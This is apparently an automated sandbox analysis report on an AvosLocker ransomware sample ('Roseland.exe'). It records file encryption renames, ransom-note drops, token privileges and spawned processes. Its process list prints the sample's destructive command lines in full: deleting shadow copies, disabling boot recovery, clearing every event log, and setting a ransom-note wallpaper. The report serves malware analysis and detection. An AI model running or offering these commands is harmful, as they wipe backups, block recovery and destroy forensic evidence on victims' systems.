Malware Analysis Report

2024-10-16 03:28

Sample ID 230316-k56l3sab26
Target Roseland.bin
SHA256 bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
Tags
avoslocker evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

Threat Level: Known bad

The file Roseland.bin was found to be: Known bad.

Malicious Activity Summary

avoslocker evasion ransomware

Avoslocker Ransomware

Modifies boot configuration data using bcdedit

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-03-16 09:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-16 09:12

Reported

2023-03-16 09:14

Platform

win7-20230220-en

Max time kernel

60s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Modifies extensions of user files

ransomware
Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Pictures\HideGroup.tiff | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\HideGroup.tiff => C:\Users\Admin\Pictures\HideGroup.tiff.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\PublishGrant.tif => C:\Users\Admin\Pictures\PublishGrant.tif.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\ResumeUnregister.tif => C:\Users\Admin\Pictures\ResumeUnregister.tif.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\SubmitUnpublish.raw => C:\Users\Admin\Pictures\SubmitUnpublish.raw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\UnblockClose.raw => C:\Users\Admin\Pictures\UnblockClose.raw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\UnregisterOpen.raw => C:\Users\Admin\Pictures\UnregisterOpen.raw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1209476241.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\settings.html | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMARQ.XML | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_F_COL.HXK | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Microsoft Games\Purble Place\de-DE\PurblePlace.exe.mui | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Thatch.thmx | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\[email protected] | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1728 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 1740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1684 wrote to memory of 1740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1684 wrote to memory of 1740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1300 wrote to memory of 2112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1300 wrote to memory of 2112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1300 wrote to memory of 2112 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 748 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2044 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 2044 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 1412 wrote to memory of 2460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1412 wrote to memory of 2460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1412 wrote to memory of 2460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1728 wrote to memory of 2900 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2900 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2900 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2900 | N/A | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 3392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 2900 wrote to memory of 3392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 2900 wrote to memory of 3392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 2900 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe
PID 2900 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe
PID 2900 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename 